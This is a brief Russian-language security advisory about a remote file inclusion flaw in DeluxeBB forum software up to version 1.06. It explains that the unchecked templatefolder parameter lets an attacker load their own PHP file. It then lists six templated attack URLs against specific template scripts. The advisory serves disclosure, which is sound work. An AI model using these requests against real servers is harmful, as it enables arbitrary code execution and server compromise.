Программа: DeluxeBB <= 1.06

Удаленный пользователь может выполнить произвольный PHP-код. Из-за того, что форум не проверяет входной параметр templatefolder в различных скриптах, у нападающего появляется возможность указать на свой файл и выполнить его с привилегиями сервера.

Пример:

http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]



Оставить мнение